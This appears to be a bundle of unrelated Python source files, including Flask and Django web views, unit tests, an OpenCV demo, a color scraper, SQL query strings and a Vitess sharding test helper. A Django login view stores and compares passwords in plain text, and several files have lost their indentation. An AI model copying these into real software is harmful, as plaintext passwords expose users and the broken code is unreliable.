    print(' -> {}'.format(t3), end='')
    t1 = t2
    t2 = t3
    c = c + 1
print(' -> FIM!')
|
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
from flask import Flask
from flaskext.mongokit import MongoKit, BSONObjectIdConverter, \
Document, Database, Collection
from werkzeug.exceptions import BadRequest
from bson import ObjectId
class BlogPost(Document):
    """MongoKit document for a blog post.

    Python 2 module: text fields are declared with `unicode`.
    """
    __collection__ = "posts"
    structure = {
        'title': unicode,
        'body': unicode,
        'author': unicode,
        'date_creation': datetime,
        'rank': int,
        'tags': [unicode],
    }
    required_fields = ['title', 'author', 'date_creation']
    # date_creation default is the callable, evaluated at save time.
    default_values = {'rank': 0, 'date_creation': datetime.utcnow}
    use_dot_notation = True
class TestCase(unittest.TestCase):
    """Integration tests for the Flask-MongoKit extension."""

    def setUp(self):
        # Fresh app bound to the 'flask_testing' database, with a pushed
        # request context so MongoKit can read the app config.
        self.app = Flask(__name__)
        self.app.config['TESTING'] = True
        self.app.config['MONGODB_DATABASE'] = 'flask_testing'
        self.db = MongoKit(self.app)
        self.ctx = self.app.test_request_context('/')
        self.ctx.push()

    def tearDown(self):
        self.ctx.pop()

    def test_initialization(self):
        self.db.register([BlogPost])
        assert len(self.db.registered_documents) > 0
        assert self.db.registered_documents[0] == BlogPost
        assert isinstance(self.db, MongoKit)
        assert self.db.name == self.app.config['MONGODB_DATABASE']
        assert isinstance(self.db.test, Collection)

    def test_property_connected(self):
        assert not self.db.connected
        self.db.connect()
        assert self.db.connected
        self.db.disconnect()
        assert not self.db.connected

    def test_bson_object_id_converter(self):
        converter = BSONObjectIdConverter("/")
        # Invalid hex must raise BadRequest; a valid 24-char hex id
        # round-trips between str and ObjectId.
        self.assertRaises(BadRequest, converter.to_python, ("132"))
        assert converter.to_python("4e4ac5cfffc84958fa1f45fb") == \
            ObjectId("4e4ac5cfffc84958fa1f45fb")
        assert converter.to_url(ObjectId("4e4ac5cfffc84958fa1f45fb")) == \
            "4e4ac5cfffc84958fa1f45fb"

    def test_save_and_find_document(self):
        self.db.register([BlogPost])
        assert len(self.db.registered_documents) > 0
        assert self.db.registered_documents[0] == BlogPost
        post = self.db.BlogPost()
        post.title = u"Flask-MongoKit"
        post.body = u"Flask-MongoKit is a layer between Flask and MongoKit"
        post.author = u"Christoph Heer"
        post.save()
        assert self.db.BlogPost.find().count() > 0
        rec_post = self.db.BlogPost.find_one({'title': u"Flask-MongoKit"})
        assert rec_post.title == post.title
        # Fix: the original compared rec_post's fields against themselves
        # (`rec_post.body == rec_post.body`), which is always true and
        # verified nothing; compare against the saved post instead.
        assert rec_post.body == post.body
        assert rec_post.author == post.author
def suite():
    """Collect every TestCase test into a single unittest suite."""
    collected = unittest.TestSuite()
    collected.addTest(unittest.makeSuite(TestCase))
    return collected


if __name__ == '__main__':
    unittest.main()
import numpy as np
import cv2
def contour():
    """Draw the convex hull and convexity-defect points of a star image.

    Loads images/star.jpg, finds its outer contour, draws the convex hull
    in red, marks the farthest point inside each defect in green, and shows
    the result until a key is pressed.
    """
    img = cv2.imread('images/star.jpg')
    imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    ret, thr = cv2.threshold(imgray, 127, 255, 0)
    # NOTE(review): the 3-value unpack matches the OpenCV 3.x findContours
    # API; OpenCV 4 returns only (contours, hierarchy) — confirm the pinned
    # cv2 version.
    _, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    cnt = contours[0]
    hull = cv2.convexHull(cnt)
    cv2.drawContours(img, [hull], 0, (0, 0, 255), 2)
    # Index form (returnPoints=False) is required by convexityDefects.
    hull = cv2.convexHull(cnt, returnPoints=False)
    # Returns the contour indices where the contour meets the convex hull,
    # plus the farthest defect point and its distance.
    defects = cv2.convexityDefects(cnt, hull)
    for i in range(defects.shape[0]):
        sp, ep, fp, dist = defects[i, 0]
        start = tuple(cnt[sp][0])  # defect start/end points (computed, unused)
        end = tuple(cnt[ep][0])
        farthest = tuple(cnt[fp][0])
        cv2.circle(img, farthest, 5, (0, 255, 0), -1)
    cv2.imshow('defects', img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()


contour()
|
# -*- coding: utf-8 -*-
import re
from colormath.color_objects import sRGBColor, LabColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
from pycolorname.color_system import ColorSystem
class CalPrint(ColorSystem):
    """Color names scraped from cal-print.com's Pantone ink color chart."""

    def __init__(self, *args, **kwargs):
        ColorSystem.__init__(self, *args, **kwargs)
        self.load()

    def refresh(self):
        """Scrape the ink chart and return a {name: (r, g, b)} mapping.

        Each color's key is suffixed with the perceptually nearest "known"
        (non-PMS) color name, chosen by CIEDE2000 distance in Lab space.
        """
        full_data = self.request('GET',
                                 "http://www.cal-print.com/InkColorChart.htm")
        # Every colored <td> cell is one swatch.
        tds = full_data.find_all('td', attrs={"bgcolor": re.compile(r".*")})
        raw_data = {}
        known_names = []
        for td in tds:
            # The swatch's human-readable name lives in the enclosing table.
            table = td.find_parent('table')
            name = table.find("font").text
            color = self.hex_to_rgb(td['bgcolor'])
            # remove excess whitespace
            name = re.sub(re.compile(r"\s+"), " ", name.strip())
            if 'PMS' not in name and 'Pantone' not in name:
                name = 'Pantone ' + name
            raw_data[name] = color
            # Numeric PMS codes are excluded from the "known name" pool.
            if not name.startswith('PMS'):
                known_names.append(name)
        # Add white
        raw_data['White'] = (255, 255, 255)
        known_names.append('White')
        # Find distance between colors and find better names for unnamed
        # colors in the table.
        data = {}
        for name, color in raw_data.items():
            rgb = sRGBColor(*color)
            lab = convert_color(rgb, LabColor, target_illuminant='D65')
            min_diff = float("inf")
            min_name = ""
            for known_name in known_names:
                known_color = raw_data[known_name]
                known_rgb = sRGBColor(*known_color)
                known_lab = convert_color(known_rgb, LabColor,
                                          target_illuminant='D65')
                diff = delta_e_cie2000(lab, known_lab)
                if min_diff > diff:
                    min_diff = diff
                    min_name = known_name
            data['{0} ({1})'.format(name, min_name)] = color
        return data
|
from script.base_api.api_operation_app.memberships import *
from script.base_api.api_operation_app.pay import *
from script.base_api.api_operation_app.versionInfo import *
from script.base_api.api_operation_app.employee import *
from script.base_api.api_operation_app.public import *
from script.base_api.api_operation_app.statistics import *
from script.base_api.api_operation_app.finance import *
from script.base_api.api_operation_app.classes import *
from script.base_api.api_operation_app.lost_communicate_record import *
from script.base_api.api_operation_app.classroom import *
from script.base_api.api_operation_app.staging import *
from script.base_api.api_operation_app.back_clue import *
from script.base_api.api_operation_app.students import *
from script.base_api.api_operation_app.clue import *
from script.base_api.api_operation_app.order import *
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__license__ = ''
__version__ = '1.0.1'
get_timezone_list_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_list_count_query = """
SELECT count(*) AS timezone_count
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_element_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND tmz.id = $1
"""
get_timezone_element_by_name_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_element_by_code_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND tmz.name = $1::VARCHAR LIMIT 1;
"""
get_timezone_list_dropdown_query = """
SELECT tmz.id AS id,
tmz.name AS name,
tmz.active AS active,
tmz.deleted AS deleted
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
|
import string
import random
def gen():
    """Prompt for a length and print a randomly generated password.

    Fixes over the original:
    - uses `secrets` (a CSPRNG) rather than `random`, which is not suitable
      for security-sensitive values;
    - samples WITH replacement, so characters may repeat and any requested
      length works (the old shuffle-a-unique-alphabet approach capped the
      length at 94 characters and could never repeat a character, which
      reduces entropy).
    """
    import secrets  # local import keeps this fix self-contained

    alphabet = (
        string.ascii_uppercase
        + string.ascii_lowercase
        + string.digits
        + string.punctuation
    )
    passlength = int(input("Enter the password length\n"))
    password = "".join(secrets.choice(alphabet) for _ in range(passlength))
    print(password)


gen()
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013-2015 Marcos Organizador de Negocios SRL http://marcos.do
# Write by Eneldo Serrata (eneldo@marcos.do)
#
##############################################################################
from openerp import models, fields, api
import base64
import openerp.addons.decimal_precision as dp
class ipf_monthly_book(models.Model):
    """OpenERP/Odoo model: one monthly fiscal (IPF) book per subsidiary and
    accounting period, with the rendered report stored as a binary blob.

    Monetary fields use the 'Account' decimal precision; labels are in
    Spanish to match the rest of the localization module.
    """
    _name = "ipf.monthly.book"
    # Subsidiary ("Sucursal") this book belongs to.
    subsidiary = fields.Many2one("shop.ncf.config", string="Sucursal", required=True)
    # Accounting period ("Periodo") covered by the book.
    period_id = fields.Many2one("account.period", string="Periodo", readonly=False, required=True)
    # Generated monthly book file (base64 binary) and its file name.
    book = fields.Binary("Libro Mensual", readonly=True)
    filename = fields.Char("file name")
    # Number of transactions included.
    doc_qty = fields.Integer("Transacciones", digits=dp.get_precision('Account'))
    # Totals and their ITBIS (tax) counterparts, split by consumer ("final")
    # and fiscal invoices, plus NC (credit-note) variants below.
    total = fields.Float("Total", digits=dp.get_precision('Account'))
    total_tax = fields.Float("Total Itbis", digits=dp.get_precision('Account'))
    final_total = fields.Float("Final total", digits=dp.get_precision('Account'))
    final_total_tax = fields.Float("Final Itbis total", digits=dp.get_precision('Account'))
    fiscal_total = fields.Float("Fiscal total", digits=dp.get_precision('Account'))
    fiscal_total_tax= fields.Float("Fiscal Itbis total", digits=dp.get_precision('Account'))
    ncfinal_total = fields.Float("NC final total", digits=dp.get_precision('Account'))
    ncfinal_total_tax = fields.Float("NC final Itbis total", digits=dp.get_precision('Account'))
    ncfiscal_total = fields.Float("NC fiscal total", digits=dp.get_precision('Account'))
ncfiscal_total_tax = fields.Float("NC fiscal Itbis total", digits=dp.get_precision('Account' )) |
from flask import render_template, redirect, url_for, flash, get_flashed_messages
from market import app
from market.forms import RegisterForm
from market.models import U2Message
# Inline-CSS snippets passed to every template render under `app_styles`.
app_styles = {}
base_style = "body { background-color: purple; color: white }"
app_styles['base'] = base_style
@app.route('/')
@app.route('/home')
def home_page():
    """Render the landing page (served at both / and /home)."""
    return render_template('home.html', app_styles=app_styles)
@app.route('/search')
def search_page():
    """Render the search page with plan items fetched from the U2 backend."""
    u2M = U2Message()
    planitems = u2M.get_planitems()
    return render_template('search.html', app_styles=app_styles, planitems=planitems)
@app.route('/select')
def select_page():
    """Render the selection page with items fetched from the U2 backend."""
    u2M = U2Message()
    items = u2M.get_items()
    return render_template('select.html', app_styles=app_styles, items=items)
# Render-only routes: each simply serves its template with the shared styles.
@app.route('/party')
def party_page():
    """Render the party page."""
    return render_template('party.html', app_styles=app_styles)
@app.route('/cart')
def cart_page():
    """Render the shopping-cart page."""
    return render_template('cart.html', app_styles=app_styles)
@app.route('/places')
def places_page():
    """Render the places page."""
    return render_template('places.html', app_styles=app_styles)
@app.route('/routes')
def routes_page():
    """Render the routes page."""
    return render_template('routes.html', app_styles=app_styles)
@app.route('/top_lists')
def top_lists_page():
    """Render the top-lists page."""
    return render_template('top_lists.html', app_styles=app_styles)
@app.route('/offers')
def offers_page():
    """Render the offers page."""
    return render_template('offers.html', app_styles=app_styles)
@app.route('/sponsors')
def sponsors_page():
    """Render the sponsors page."""
    return render_template('sponsors.html', app_styles=app_styles)
@app.route('/subscriptions')
def subscriptions_page():
    """Render the subscriptions page."""
    return render_template('subscriptions.html', app_styles=app_styles)
@app.route('/bookings')
def bookings_page():
    """Render the bookings page."""
    return render_template('bookings.html', app_styles=app_styles)
@app.route('/register', methods=['GET', 'POST'])
def register_page():
    """Show the registration form; on a valid POST redirect to the home page.

    NOTE(review): actual user creation is still a stub (`# create user u2`).
    """
    form = RegisterForm()
    if form.validate_on_submit():
        # create user u2
        return redirect(url_for('home_page'))
    # print(f'no. errors = {form.errors}')
    # Surface each form validation error as a flashed "danger" message.
    if form.errors != {}:
        for err_msg in form.errors.values():
            flash(f'There was an Error creating a User: {err_msg}', category="danger")
    return render_template('register.html', app_styles=app_styles, form=form)
|
# This file is part of beets.
# Copyright 2016, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
import unittest
from unittest.mock import Mock
from test import _common
from beetsplug import lastgenre
from beets import config
from test.helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
    def setUp(self):
        # Fresh in-memory beets environment plus a plugin instance per test.
        self.setup_beets()
        self.plugin = lastgenre.LastGenrePlugin()

    def tearDown(self):
        self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1,
prefer_specific=False):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
config['lastgenre']['prefer_specific'] = prefer_specific
if isinstance(whitelist, (bool, (str,))):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, (str,))):
# Explicit list of genres.
self.plugin.whitelist = whitelist
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
canonical=True,
count=2)
# thanks to c14n, 'blues' superseeds 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_prefer_specific_loads_tree(self):
"""When prefer_specific is enabled but canonical is not the
tree still has to be loaded.
"""
self._setup_config(prefer_specific=True, canonical=False)
self.assertNotEqual(self.plugin.c14n_branches, [])
def test_prefer_specific_without_canonical(self):
"""Prefer_specific works without canonical.
"""
self._setup_config(prefer_specific=True, canonical=False, count=4)
self.assertEqual(self.plugin._resolve_genres(
['math rock', 'post-rock']),
'Post-Rock, Math Rock')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem:
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj:
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem('Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem('Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, ['pop', 'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, ['pop'])
def test_get_genre(self):
mock_genres = {'track': '1', 'album': '2', 'artist': '3'}
def mock_fetch_track_genre(self, obj=None):
return mock_genres['track']
def mock_fetch_album_genre(self, obj):
return mock_genres['album']
def mock_fetch_artist_genre(self, obj):
return mock_genres['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = mock_genres['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['artist'], 'artist'))
mock_genres['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def test_sort_by_depth(self):
self._setup_config(canonical=True)
# Normal case.
tags = ('electronic', 'ambient', 'post-rock', 'downtempo')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(
res, ['post-rock', 'downtempo', 'ambient', 'electronic'])
# Non-canonical tag ('chillout') present.
tags = ('electronic', 'ambient', 'chillout')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(res, ['ambient', 'electronic'])
def suite():
    """Build and return the unittest suite for this module."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
|
from gala import imio
import h5py
import numpy as np
from skimage._shared._tempfile import temporary_file
def test_cremi_roundtrip():
    """Write a CREMI-format HDF5 file and check it reads back unchanged,
    including the default resolution attribute."""
    raw_image = np.random.randint(256, size=(5, 100, 100), dtype=np.uint8)
    labels = np.random.randint(4096, size=raw_image.shape, dtype=np.uint64)
    for ax in range(labels.ndim):
        labels.sort(axis=ax)  # try to get something vaguely contiguous. =P
    with temporary_file('.hdf') as fout:
        imio.write_cremi({'/volumes/raw': raw_image,
                          '/volumes/labels/neuron_ids': labels}, fout)
        raw_in, lab_in = imio.read_cremi(fout)
        # Fix: open read-only with an explicit mode (h5py's implicit
        # default mode is deprecated) and use a context manager so the
        # handle is closed even if an assertion fails.
        with h5py.File(fout, 'r') as f:
            stored_resolution = f['/volumes/raw'].attrs['resolution']
        np.testing.assert_equal(stored_resolution, (40, 4, 4))
        np.testing.assert_equal(raw_in, raw_image)
        np.testing.assert_equal(lab_in, labels)
# Create your views here.
from django.http import HttpResponse
from django.template import Context, loader
from django.http import Http404,HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404,render
from storefront.models import Store,StoreAdmin
def home(request):
    """Render the landing page.

    NOTE(review): both branches render the same 'storefront/login.html'
    template, so the session check currently has no effect — presumably
    the logged-in branch was meant to render a different page; confirm
    the intended template with the author.
    """
    # return HttpResponse("U have been redirected to the home page - Hello World!")
    if 'email' in request.session:
        return render(request, 'storefront/login.html')
    else:
        return render(request, 'storefront/login.html')
def login(request):
    """Authenticate a store admin from the POSTed email/password.

    Returns plain HttpResponse messages describing the outcome; on
    success, stores the admin's id in the session under 'uid'.

    SECURITY NOTE(review): passwords are stored and compared in plain
    text — they should be hashed (e.g. via django.contrib.auth).
    """
    # .get() avoids a KeyError (and a 500) when a field is absent from
    # the POST body; the original also leaked credentials via debug prints.
    email = request.POST.get('email', '')
    password = request.POST.get('password', '')
    if not email or not password:
        return HttpResponse("Enter the Details")
    try:
        userDetails = StoreAdmin.objects.get(admin_email=email)
    except StoreAdmin.DoesNotExist:
        return HttpResponse("User doesnot exist")
    if userDetails.admin_password == password:
        request.session['uid'] = userDetails.id
        return HttpResponse("Login Successful")
    # Wrong password falls through to the generic prompt (original behavior).
    return HttpResponse("Enter the Details")
def register(request):
    """Create a Store and its admin account from the POSTed form data,
    remember the admin's email in the session, and show the home page."""
    store = Store(
        store_name=request.POST['store_name'],
        store_address=request.POST['store_address'],
        store_phone=request.POST['store_phone'],
        store_website=request.POST['store_website'],
        store_email=request.POST['store_email'],
        store_hours=request.POST['store_hours'],
    )
    store.save()
    storead = StoreAdmin(
        admin_email=request.POST['admin_email'],
        admin_password=request.POST['admin_password'],
        admin_storeid=store,
    )
    storead.save()
    request.session['email'] = storead.admin_email
    return home(request)
def index(request):
    """Alias of home(): the index URL renders the landing page."""
    return home(request)
|
from django.contrib import admin
# Register your models here.
from tags.models import TagTeacher, TagOpening, ViewTeacherUnique, ViewOpening, FavTeacher, FavOpening, ViewTeacherRecord, ViewTeacherNonUnique, SearchWordTeacherRecord, BlockUser
class SearchWordTeacherRecordAdmin(admin.ModelAdmin):
    """Admin list view for teacher search-word records."""

    list_display = ['__unicode__', 'user', 'subject', 'level', 'date']
    # Removed dead code from the original: an empty `inlines = []` (already
    # the ModelAdmin default) and an inner `class Meta`, which ModelAdmin
    # ignores — the model is bound at admin.site.register() time.
class ViewTeacherRecordAdmin(admin.ModelAdmin):
    """Admin list view for per-teacher view/message/order counters."""

    list_display = ['__unicode__', 'uniquecount', 'nonuniquecount',
                    'msgcount', 'ordercount', 'date', 'updated']
    # Removed dead code from the original: an empty `inlines = []` (already
    # the ModelAdmin default) and an inner `class Meta`, which ModelAdmin
    # ignores — the model is bound at admin.site.register() time.
# Plain registrations use the default ModelAdmin.
admin.site.register(TagTeacher)
admin.site.register(TagOpening)
admin.site.register(ViewTeacherUnique)
admin.site.register(ViewTeacherNonUnique)
admin.site.register(ViewOpening)
admin.site.register(FavTeacher)
admin.site.register(FavOpening)
# Record models get the customized admins with richer list displays.
admin.site.register(ViewTeacherRecord, ViewTeacherRecordAdmin)
admin.site.register(SearchWordTeacherRecord, SearchWordTeacherRecordAdmin)
admin.site.register(BlockUser)
|
#WAP to print all the even numbers upto a given number
n=input('Enter end point of even numbers :')
count=0
for i in range(0,n-1,2):
i=i+2
print i,
count=count+i
print""
print count
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains a base class and utility functions for sharding tests.
"""
import struct
import logging
from vtdb import keyrange_constants
import utils
# Type of the keyspace_id column used by these tests (unsigned 64-bit int).
keyspace_id_type = keyrange_constants.KIT_UINT64
# Feature toggles for test variants (row-based replication, multi split diff).
use_rbr = False
use_multi_split_diff = False
# Packs a Python int into a big-endian uint64 — the binary keyspace-id format.
pack_keyspace_id = struct.Struct('!Q').pack
# fixed_parent_id is used as fixed value for the "parent_id" column in all rows.
# All tests assume a multi-column primary key (parent_id, id) but only adjust
# the "id" column and use this fixed value for "parent_id".
# Since parent_id is fixed, not all test code has to include parent_id in a
# WHERE clause (at the price of a full table scan).
fixed_parent_id = 86
class BaseShardingTest(object):
    """This base class uses unittest.TestCase methods to check various things.

    All sharding tests should inherit from this base class, and use the
    methods as needed.
    """

    # _insert_value inserts a value in the MySQL database along with the comments
    # required for routing.
    # NOTE: We assume that the column name for the keyspace_id is called
    # 'custom_ksid_col'. This is a regression test which tests for
    # places which previously hardcoded the column name to 'keyspace_id'.
    def _insert_value(self, tablet_obj, table, mid, msg, keyspace_id):
        k = utils.uint64_to_hex(keyspace_id)
        tablet_obj.mquery(
            'vt_test_keyspace',
            ['begin',
             'insert into %s(parent_id, id, msg, custom_ksid_col) '
             'values(%d, %d, "%s", 0x%x) /* vtgate:: keyspace_id:%s */ '
             '/* id:%d */' %
             (table, fixed_parent_id, mid, msg, keyspace_id, k, mid),
             'commit'],
            write=True)

    def _insert_multi_value(self, tablet_obj, table, mids, msgs, keyspace_ids):
        """Generate multi-shard insert statements."""
        comma_sep = ','
        querystr = ('insert into %s(parent_id, id, msg, custom_ksid_col) values'
                    % (table))
        values_str = ''
        id_str = '/* id:'
        ksid_str = ''
        for mid, msg, keyspace_id in zip(mids, msgs, keyspace_ids):
            ksid_str += utils.uint64_to_hex(keyspace_id) + comma_sep
            values_str += ('(%d, %d, "%s", 0x%x)' %
                           (fixed_parent_id, mid, msg, keyspace_id) + comma_sep)
            id_str += '%d' % (mid) + comma_sep
        # Strip the trailing separators and append the routing comments.
        values_str = values_str.rstrip(comma_sep)
        values_str += '/* vtgate:: keyspace_id:%s */ ' % (ksid_str.rstrip(comma_sep))
        values_str += id_str.rstrip(comma_sep) + '*/'
        querystr += values_str
        tablet_obj.mquery(
            'vt_test_keyspace',
            ['begin',
             querystr,
             'commit'],
            write=True)

    def _exec_non_annotated_update(self, tablet_obj, table, mids, new_val):
        # Update rows directly on MySQL, with no vtgate routing comments.
        tablet_obj.mquery(
            'vt_test_keyspace',
            ['begin',
             'update %s set msg = "%s" where parent_id = %d and id in (%s)' %
             (table, new_val, fixed_parent_id, ','.join([str(i) for i in mids])),
             'commit'],
            write=True)

    def _exec_non_annotated_delete(self, tablet_obj, table, mids):
        # Delete rows directly on MySQL, with no vtgate routing comments.
        tablet_obj.mquery(
            'vt_test_keyspace',
            ['begin',
             'delete from %s where parent_id = %d and id in (%s)' %
             (table, fixed_parent_id, ','.join([str(i) for i in mids])),
             'commit'],
            write=True)

    def _get_value(self, tablet_obj, table, mid):
        """Returns the row(s) from the table for the provided id, using MySQL.

        Args:
          tablet_obj: the tablet to get data from.
          table: the table to query.
          mid: id field of the table.

        Returns:
          A tuple of results.
        """
        return tablet_obj.mquery(
            'vt_test_keyspace',
            'select parent_id, id, msg, custom_ksid_col from %s '
            'where parent_id=%d and id=%d' %
            (table, fixed_parent_id, mid))

    def _check_value(self, tablet_obj, table, mid, msg, keyspace_id,
                     should_be_here=True):
        # Assert the row's exact contents (or its absence when
        # should_be_here=False).
        result = self._get_value(tablet_obj, table, mid)
        if keyspace_id_type == keyrange_constants.KIT_BYTES:
            # Binary keyspace ids are stored packed; match that format.
            fmt = '%s'
            keyspace_id = pack_keyspace_id(keyspace_id)
        else:
            fmt = '%x'
        if should_be_here:
            self.assertEqual(result, ((fixed_parent_id, mid, msg, keyspace_id),),
                             ('Bad row in tablet %s for id=%d, custom_ksid_col=' +
                              fmt + ', row=%s') % (tablet_obj.tablet_alias, mid,
                                                   keyspace_id, str(result)))
        else:
            self.assertEqual(
                len(result), 0,
                ('Extra row in tablet %s for id=%d, custom_ksid_col=' +
                 fmt + ': %s') % (tablet_obj.tablet_alias, mid, keyspace_id,
                                  str(result)))

    def _is_value_present_and_correct(
            self, tablet_obj, table, mid, msg, keyspace_id):
        """_is_value_present_and_correct tries to read a value.

        Args:
          tablet_obj: the tablet to get data from.
          table: the table to query.
          mid: the id of the row to query.
          msg: expected value of the msg column in the row.
          keyspace_id: expected value of the keyspace_id column in the row.

        Returns:
          True if the value (row) is there and correct.
          False if the value is not there.
          If the value is not correct, the method will call self.fail.
        """
        result = self._get_value(tablet_obj, table, mid)
        if not result:
            return False
        if keyspace_id_type == keyrange_constants.KIT_BYTES:
            fmt = '%s'
            keyspace_id = pack_keyspace_id(keyspace_id)
        else:
            fmt = '%x'
        self.assertEqual(result, ((fixed_parent_id, mid, msg, keyspace_id),),
                         ('Bad row in tablet %s for id=%d, '
                          'custom_ksid_col=' + fmt) % (
                              tablet_obj.tablet_alias, mid, keyspace_id))
        return True

    def check_binlog_player_vars(self, tablet_obj, source_shards,
                                 seconds_behind_master_max=0):
